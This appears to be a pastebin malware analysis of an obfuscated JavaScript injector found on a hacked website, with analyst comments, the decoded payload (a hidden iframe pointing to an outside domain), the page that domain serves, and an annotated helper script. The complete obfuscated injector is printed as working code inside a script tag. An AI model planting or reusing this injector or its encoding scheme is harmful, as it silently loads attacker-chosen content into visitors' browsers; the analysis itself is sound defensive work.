dirgotronix

Javascript Obfuscation - virus

Apr 3rd, 2011
  1. // This code was pulled from a hacked website on a rooted server. It is identified as a virus. It was deconstructed and rebuilt in C# to work out its purpose, which is to write a hidden iframe into the page (see the decoded result below). The C# rebuild can be found here: http://pastebin.com/090yyjb5
  2.  
  // Analyst notes on the injected script below (kept byte-for-byte as found):
  // - vzxbnb25(z) walks z in chunks of at most 1024 characters (m) and calls eval() once per chunk.
  // - Each input character is looked up in the table d at index (charCode - 48); the looked-up
  //   value is OR-ed into the accumulator x at bit offset w.
  // - When w is 0 nothing is emitted and w becomes 6; otherwise one character is emitted as
  //   169 ^ (x & 255) ("&" binds tighter than "^"), x is shifted right by 8 and w drops by 2.
  //   Four input characters therefore yield three output characters, each XOR-ed with 169.
  // - The only sink is eval(h): the decoded text runs with the privileges of the hosting page.
  //   For analysis, recover h by reimplementing or logging the decoder outside a browser rather
  //   than loading this line; the author's decoded result is quoted in the comment that follows.
  // - NOTE(review): the one-line layout and the function name look machine-generated, so a
  //   signature is probably better keyed on the decoder's structure than on the name — confirm
  //   against other samples.
  3. <script language=JavaScript>    function vzxbnb25(z){ var c=z.length,m=1024,i,s,h,b=0,w=0,x=0,d=Array(63,13,0,37,18,42,51,52,30,35,0,0,0,0,0,0,8,36,34,53,50,10,2,60,1,58,57,62,33,24,43,20,32,56,12,4,38,6,41,29,26,31,44,0,0,0,0,25,0,55,11,9,7,46,40,54,21,27,17,23,3,59,61,48,49,45,22,28,15,5,16,47,19,14,39);for(s=Math.ceil(c/m);s>0;s--){h='';for(i=Math.min(c,m);i>0;i--,c--){{x|=(d[z.charCodeAt(b++)-48])<<w;if(w){h+=String.fromCharCode(169^x&255);x>>=8;w-=2}else{w=6}}}eval(h);}}vzxbnb25('8lGp1iZad5Wa@a1aXxV9qiGpRmfA1iZDsxR6danL8w1oW6sPyrcotw1DS6sBd9RpRx_6vDRTc5ngExJBHaWa_tVLUIVg_6R61Y@od0ZpUgqLrIfPA9saHYQgU6np1d@J@aWode1DdaZpSd@PlBcAv5Jz2Ef91lc6MIfPyeMB8ls6WdR3ie_zcUR62msoWx_AvTfgWlWpRxJB1lZg_kRDvtJpUYR6b8_3UFG6i9RpRYV92F')</script>
  4.  
  5. // Decoded result (the string the script above hands to eval()): "window.status='Done';document.write('<iframe name=d9e1 src=\"http://7speed.info/t/?'+Math.round(Math.random()*19936)+'d9e1'+'\" width=224 height=89 style=\"display:none\"></iframe>')"
  6.  
  7. // The page returned by the iframe URL in that result:
  8.  
  9. <html>
  10.  
  11. <head>
  12. <title>7speed.info</title>
  13. <script type="text/javascript" src="/js/general.js"></script>
  14. <script type="text/javascript">
  15. ChkRequestEnc('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');
  16. </script>
  17. <script type="text/javascript">
  18.  
  19. </script>
  20. </head>
  21.  
  22. <frameset rows="100%,*" frameborder="no" border="0" framespacing="0">
  23.   <!-- SCC a2 -->
  24.   <frame src="http://searchportal.information.com/?o_id=136598&domainname=7speed.info">
  25.  
  26. <noframes>
  27. <body bgcolor="#ffffff" text="#000000">
  28.   <a href="http://searchportal.information.com/?o_id=136598&domainname=7speed.info">Click here to enter</a>.
  29. </body>
  30. </noframes>
  31. </frameset>
  32.  
  33. // The JavaScript file referenced by the page above (/js/general.js):
  34.  
  35. ////////////////////////////////////////////////////////////////////
  36. // XML functions and AJAX things
  37. ////////////////////////////////////////////////////////////////////
  38.  
  // Single request object shared by every helper in this file: ChkRequestEnc and
  // ChkPopunderEnc both overwrite it and fillMessage reads it, so a second call made
  // while a request is still in flight replaces the object the handler inspects.
  39. var xmlHttp;
  40.  
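  /**
   * Send a GET request to /check_image.php carrying the caller-supplied token.
   *
   * The request object is stored in the shared global `xmlHttp`, and `fillMessage`
   * is installed as its readystatechange handler.
   *
   * @param {string} Encoded - Opaque value sent as the `enc` query parameter.
   * @returns {boolean} false when no XMLHttpRequest implementation is available,
   *     true once the request has been handed to send().
   */
  function ChkRequestEnc(Encoded)
  {
      xmlHttp = GetXmlHttpObject();
      if (xmlHttp == null)
      {
          alert("Browser does not support HTTP Request");
          return false;
      }
      // encodeURIComponent replaces the deprecated escape(): it also encodes "+", "/"
      // and "@" and emits UTF-8 percent-escapes instead of the non-standard %uXXXX form,
      // so the token survives ordinary query-string decoding unchanged.
      // `rand` is only a cache-buster; Math.random() is not a security control.
      var urlPass = "/check_image.php?enc=" + encodeURIComponent(Encoded) + "&rand=" + Math.random();
      xmlHttp.onreadystatechange = fillMessage;
      // A primitive string is passed to open(); the former `new String(...)` wrapper
      // and the self-assigned, never-read `SesId` local were dead weight.
      xmlHttp.open("GET", urlPass);
      xmlHttp.send(null);
      return true;
  }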
  59.  
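  /**
   * Send a GET request to /check_popunder.php carrying the caller-supplied token.
   *
   * The request object is stored in the shared global `xmlHttp`, and `fillMessage`
   * is installed as its readystatechange handler.
   *
   * @param {string} Encoded - Opaque value sent as the `enc` query parameter.
   * @returns {boolean} false when no XMLHttpRequest implementation is available,
   *     true once the request has been handed to send().
   */
  function ChkPopunderEnc(Encoded)
  {
      xmlHttp = GetXmlHttpObject();
      if (xmlHttp == null)
      {
          alert("Browser does not support HTTP Request");
          return false;
      }
      // encodeURIComponent replaces the deprecated escape(): it also encodes "+", "/"
      // and "@" and emits UTF-8 percent-escapes instead of the non-standard %uXXXX form,
      // so the token survives ordinary query-string decoding unchanged.
      // `rand` is only a cache-buster; Math.random() is not a security control.
      var urlPass = "/check_popunder.php?enc=" + encodeURIComponent(Encoded) + "&rand=" + Math.random();
      xmlHttp.onreadystatechange = fillMessage;
      // A primitive string is passed to open(); the former `new String(...)` wrapper
      // and the self-assigned, never-read `SesId` local were dead weight.
      xmlHttp.open("GET", urlPass);
      xmlHttp.send(null);
      return true;
  }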
  78.  
  /**
   * readystatechange handler for the shared `xmlHttp` request.
   *
   * The response body is never read here, so the handler has no visible effect on
   * the page. The original carried disabled lines that would have copied
   * xmlHttp.responseText into the innerHTML of element 'imp_msg'; re-enabling them
   * would insert the server response as HTML without any sanitising.
   *
   * @returns {boolean|undefined} true once readyState is 4 or "complete",
   *     otherwise undefined.
   */
  function fillMessage()
  {
      var state = xmlHttp.readyState;
      var finished = (state == 4) || (state == "complete");
      if (!finished)
      {
          return;
      }
      return true;
  }
  89.  
  /**
   * Create a request object using whichever implementation `window` exposes.
   *
   * window.XMLHttpRequest is tried first; the "Microsoft.XMLHTTP" ActiveX object
   * is the fallback.
   *
   * @returns {Object|null} A new request object, or null when neither
   *     implementation is present.
   */
  function GetXmlHttpObject()
  {
      if (window.XMLHttpRequest)
      {
          return new XMLHttpRequest();
      }
      if (window.ActiveXObject)
      {
          return new ActiveXObject("Microsoft.XMLHTTP");
      }
      return null;
  }